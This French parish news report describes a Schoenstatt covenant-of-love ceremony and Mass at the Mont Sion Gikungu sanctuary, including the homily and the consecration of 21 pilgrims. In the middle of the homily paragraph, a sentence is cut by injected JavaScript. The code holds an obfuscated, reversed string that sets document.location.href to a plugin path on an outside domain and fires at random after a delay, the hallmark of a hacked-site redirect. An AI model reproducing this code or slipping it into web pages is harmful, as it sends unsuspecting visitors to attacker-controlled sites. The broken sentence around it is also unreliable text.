Samedi le 28 mai 2022, au Sanctuaire marial de Schoenstatt au Mont Sion Gikungu, 21 pèlerins ont eu l’occasion de conclure l’alliance d’amour avec la Vierge Marie. La Sainte Messe de ce jour a débuté à 11h00 dans le sanctuaire et a été présidée par le Père Herménégilde COYITUNGIYE, Recteur du
Sanctuaire.
Au début, il a souhaité la bienvenue de manière spéciale à ceux qui se sont préparés pour conclure l’alliance d’amour avec la Mère de Dieu, et ensuite aux choristes de la Paroisse Matara venus au sanctuaire pour une récollection. Signalons que ce sont ces choristes qui nous ont aidés pour l’animation des chants liturgiques pendant la Messe.
Dans son homélie, le célébrant a montré l’importance de la Vierge Marie dans la vie de chaque chrétien, et encore plus pour ceux qui se sont consacrés à elle dans l’alliance d’amour. Il nous a rappelé que tout ce que nous demantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons au nom de Marie, nous le recevrons parce que le Seigneur Jésus ne peut rien refuser à sa Mère, comme nous le voyons à titre d’exemple aux noces de Cana en Galilée. En se basant sur l’Evangile de ce jour, là où Jésus dit : « Jusqu’à maintenant, vous n’avez rien demandé en mon nom. Demandez et vous recevrez, et ainsi votre joie sera complète. » (Jn 16,24), il a aidé tous ceux qui étaient là à garder conscience que tout ce que nous demanderons et encore au nom de la Vierge Marie, elle aussi le fera grâce à sa toute-puissance d’intercession accordée par Jésus son Fils. Comme la parole de Dieu nous disait encore que Jésus est venu du Père pour arriver au monde, il nous a fait comprendre aussi que Jésus est venu aussi du sein de la Vierge Marie pour arriver chez nous, et personne ne peut ignorer cela.
Après l’homélie, a suivi la consécration de ceux qui se sont préparés. Chacun est appelé en son nom et il a répondu : ‘Me voici’ ; comme signe qu’ils veulent se mettre à la disposition de la Vierge Marie pour
qu’elle l’aide à accomplir la volonté de Dieu dans sa vie. Après cela, c’était le dialogue entre ceux qui se consacrent et le prêtre. A la fin de ce rite, chacun(e) a reçu un signe d’alliance. Pour les hommes et les
garçons, c’étaient ‘la croix d’unité’ où nous y trouvons Jésus avec sa Mère et pour les femmes et filles, ‘la médaille de la Mère trois fois admirable’ là aussi figure Marie et son Fils.
Après la conclusion de l’alliance d’amour, la Sainte Messe a continué comme normal et ceux qui venaient de sceller l’alliance avec la Mère Trois fois Admirable de Schoenstatt avaient préparé des offrandes en nature pour rendre grâce pour tout cet honneur que la Vierge Marie les a comblé en les accueillant dans son cœur par cette alliance d’amour et les aidant à entrer dans l’intimité avec le Dieu Trinité.
A la fin de ces saintes cérémonies, le Père Recteur les a félicités de nouveau pour cet acte important qu’ils viennent de réaliser et a remercié cordialement les choristes de la Paroisse Matara qui avaient très bien animé au cours de la Messe les invitant de venir une autre fois pour encore nous aider à louer Dieu.

Après la Messe, c’était un partage fraternel d’un verre et de joie au Centre Reine de la Confiance, avec tous ceux qui sont venus les soutenir notamment leurs ainés dans l’alliance d’amour et leurs parentés.

Sœur M. Alice AKIMANA